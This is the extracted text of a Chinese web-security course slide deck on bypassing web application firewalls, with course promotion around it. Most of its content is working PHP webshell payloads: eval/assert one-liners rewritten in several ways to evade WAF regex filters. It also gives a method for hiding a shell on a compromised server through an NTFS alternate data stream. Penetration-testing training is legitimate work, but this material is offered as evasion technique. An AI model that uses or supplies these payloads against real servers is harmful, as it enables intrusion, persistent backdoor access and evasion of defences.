bypass绕过阻挡我们的waf下.pptx

掌控安全 - Web安全微专业 讲师：聂风 bypass-绕过阻挡我们的WAF(下) 等待开课 等待开课 今日课程：bypass-绕过阻挡我们的WAF(下) 等待其他同学入场（8.00-8.05） 8.05准时开讲！ #好课程帮忙推# 快推荐同学、同事一起加入班级，来学习课程啦！ 推荐人可以得到500元的福利，被推荐者购买课程时可以享受折扣优惠哦！ #详情联系辅导员# 微信公众号：掌控安全EDU #欢迎大家添加我的微信号：zkaq-niefeng 本章内容 bypass-绕过阻挡我们的WAF(下) #本节主要内容总结 一、Waf检测机制 二、常见绕过手法 Waf检测机制 这里我们开始讲Webshell小马的绕过。 我们最常见的PHP一句话木马那就是 <?php eval($_REQUEST['a'])?> 这个就是密码是a的一句话木马。 这个语句肯定是会被拦截的，那么有没有思考过是怎么拦截的妮？ 关于拦截其实最主要的还是测试，看看Waf究竟怎么拦截。[最直接的检测应该是正则匹配] 我们尝试只写<?php eval();?> 发现没有拦截，但是加了$_REQUEST['a']就拦截了 那么我们是不是可以尝试测试看看究竟拦截$_REQUEST['a']的那个部分。 然后测试发现，他拦截的是$_REQUEST[ 那么我们只要不出现中括号就可以解决对吗？或者我们尝试把这个变量换一个就可以解决。 例如：<?php eval(end($_REQUEST));?> 这个语句就没有出现$_REQUEST[ 所以成功过狗，我们用end来替代了[] end 函数的意义：输出数组中的当前元素和最后一个元素的值，然后因为我的传参就一个。 常见绕过手法 通过常量定义：<?php define("a","$_GET[1]");eval(a); 通过字符串拼接 + 双美元符号： <?php $a='ass'; $b='ert'; $funcName=$a.$b; $x='funcName'; $$x($_REQUEST[1]); 通过函数定义强行分割： <?php function a($a){ return $a;} eval(a($_REQUEST)[1]);?> 常见绕过手法 通过类定义，然后传参强行分割 <?php class User { public $name = ''; function __destruct(){ eval("$this->name"); } } $user = new User; $user->name = ''.$_REQUEST[1]; ?> 常见绕过手法 多方式传参免杀： <?php $COOKIE = $_COOKIE; foreach($COOKIE as $key => $value){ if($key=='assert'){ $key($_POST['s'];) } } ?> <?php $a=get_defined_functions(); $a['internal'][841]($_GET['a']); 常见绕过手法 绕过市面上所有WAF(终极手法) <?php eval(mysqli_fetch_assoc(mysqli_query(mysqli_connect('127.0.0.1','root','root','maoshe'),'select * from info'))['info']); 拿到shell之后藏shell的妙招：ntfs文件流 <?php include('/:123.txt')?> + echo "<?php eval($_REQUEST[a])?>" >> /:123.txt 课程回放会在一天内上传至腾讯课堂！ 本节课程到此结束，谢谢大家，下节见！ #好课程帮忙推# 快推荐同学、同事一起加入班级，来学习课程啦！ 推荐人可以得到500元的福利，被推荐者购买课程时可以享受折扣优惠哦！ #详情联系辅导员# 下节内容：就业指导 — 岗位、简历、内推 11月30日周六晚8点！ 不见不散！ #微信号：zkaq-niefeng